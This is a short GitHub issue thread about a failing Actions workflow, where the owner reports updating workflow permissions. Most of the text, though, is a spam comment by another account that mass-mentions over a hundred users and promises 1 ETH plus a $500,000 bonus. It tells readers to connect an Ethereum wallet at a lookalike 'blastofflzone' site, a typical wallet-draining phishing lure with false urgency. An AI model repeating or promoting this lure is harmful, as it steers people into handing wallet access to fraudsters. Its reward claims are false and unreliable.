### ISSUE TITLE
👷‍♂️ Issue with GitHub Actions 

### ISSUE THREAD

**Issue by bagg3rs** [bagg3rs/team-api#5]
[workflow](https://github.com/bagg3rs/team-api/actions/runs/5877488566)

**Comment by bagg3rs** [comment]
Updated workflow permissions to allow PR and write access for actions.

**Comment by steamyrails** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
LastPlayerTR, @shunshun1023, @codingkrolyian, @dorienh, @haliskilic, @dnanhkhoa, @systats, @kecheon, @h0wXD, @amasu, @kuzyasun, @andreicozma1, @yunjiali, @JulesBern, @alexnoox, @blakeandrewwood, @daddyboo, @Unatine, @achimcc, @arijitAD, @digitalhobo, @jiahao1889, @MonoAutomation, @cleett, @bradtrebilcock, @secp8x32, @CMD-reverse, @ydm, @Ramtinhoss, @joe-nano, @1984bot, @catman85, @leadmanager05, @iKiok, @oudommeas, @victorgrubio, @ericoloewe, @Mame29, @kiratheone, @jhammant, @Jatin794, @MikeRobGIT, @xmatthias, @tombayley, @mentecuantica, @caladiele, @JounyWang, @YarnSeemannsgarn, @ddanninger, @mahmoudeid789saicomagic, @szoketommy, @vfresearch, @diogopms, @CoryKrol, @mzhukovs, @dfalci, @Alfaholicy, @beakman, @alex-tifrea, @uzbekdev1, @treyhoover, @geeklimit, @risecloud, @luluhoc, @ygor, @planetlibra29, @johnywellington, @bigMoonz, @dnanhkhoa, @rbmarliere, @ne0c0de, @onurdersan, @tarunc, @phoorichet, @tariqhamid, @PShuvaev, @choeisai, @yaotian, @coolejungenhihi, @MikeRobGIT, @ctwhome, @ddanninger, @gerardsyd, @dlepaux, @jakobzhao, @djatlantic, @wddxnyr, @davidpr0811, @pythonjokeun, @yeyuliuguang, @cwali09, @adriana-olszak, @thelyo, @bodhi996, @iltera, @adriaesteve, @jtroby, @rkarna14, @kbagherKris191, @Jesse27, @discountry, @wwu, @trevisanweb, @robbenmu, @unknownMarty, @StevenGolhen, @Hacko-nPacko, @ugurcanb, @wheng3, @langhai8045, @AcidP0ison, @samchaaa, @CoryKrol, @simwai, @interkenny, @JeromyJSmith, @Bakeneko, @matheusmiranda26, @falberto, @nibarulabs, @alcalawil, @suriyaa, @RodrigoTorresWeb, @ShayanJa, @mengunogul, @SvyatS, @skyh24, @wddxnyr, @r00t9, @andreazetyawan, @AdityaNayak, @planetlibra29, @hotheadhacker, @seven1oe, @coskun, @TonyKz, @andreicozma1, @qa1, @5l1v3r1, @mgogel, @od-git, @xVytis, @arielmza00, @zero-direwolf, @yashbaheti1971, @yareyaredesuyo, @Bribon4, @soerenmartius
